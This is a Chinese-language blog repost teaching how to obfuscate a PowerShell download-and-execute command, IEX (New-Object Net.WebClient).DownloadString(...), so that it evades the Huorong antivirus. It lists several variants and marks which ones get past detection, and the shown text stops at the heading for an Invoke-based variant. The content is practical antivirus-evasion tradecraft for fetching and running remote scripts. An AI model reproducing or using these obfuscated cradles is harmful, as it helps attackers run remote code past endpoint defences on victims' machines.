热门标签
热门文章
- 1记录vue3+ts配置文件无需重新打包_vue3配置静态路径 无须重复打包
- 2unity 中 json数据一种简单解析方式_unity json hashtable
- 3解决Docker报错问题:Docker Desktop – Unexpected WSL error_docker desktop unexpected wsl error
- 4【Unity实战100例】Unity表数据解析Excel方式二_unity miniexcel
- 5【玩转幻兽帕鲁Palworld部署】2024年腾讯云、阿里云、华为云搭建幻兽帕鲁游戏联机服务器教程_腾讯云可以建帕鲁服务器吗
- 6Android利用NDK实现C++开发_ndk开发egl
- 7【ES常用查询】基于ElasticsearchRestTemplate及NativeSearchQuery的查询_java es查询elasticsearchresttemplate
- 8TensorRT8 meets Python(一)解决TensorRT8部署+升级的坑
- 9springboot集成rabbitmq手动AKC机制_channel.basicack(message.getmessageproperties().ge
- 10推荐系统多目标学习之loss权重_推荐系统的多任务学习loss计算
当前位置: article > 正文
powershell命令语句混淆免杀(bypass火绒)_iex (new-object system.net.webclient)
作者:繁依Fanyi0 | 2024-02-27 12:19:32
赞
踩
iex (new-object system.net.webclient)
基础混淆
原始语句(不免杀)
powershell “IEX (New-Object System.Net.WebClient).DownloadString(‘http://127.0.0.1/a.ps1’)"
AV:火绒
混淆测试
New-Object System.Net 类可以直接替换成 New-Object Net 类(不免杀)
powershell "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1/a.ps1')"
- 1
对于 DownloadString 函数中的 URL 字符串可以采用直接拼接的方式进行组合和拆分(不免杀)
powershll "IEX (New-Object Net.WebClient).DownloadString('ht'+'tp://127.0.0.1/a.ps1')"
- 1
定义一个变量,其值赋为New-Object(免杀)
powershell "$w=(New-Object Net.WebClient);IEX $w.DownloadString('ht'+'tp://127.0.0.1/a.ps1')"
- 1
用字符串DownloadString替换 DownloadString()函数(免杀)
powershell "IEX (New-Object Net.WebClient).('DownloadString')('h'+'ttp://127.0.0.1/a.ps1')"
- 1
使用 Invoke 调用方法(免杀)
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/繁依Fanyi0/article/detail/152890?site
推荐阅读
相关标签
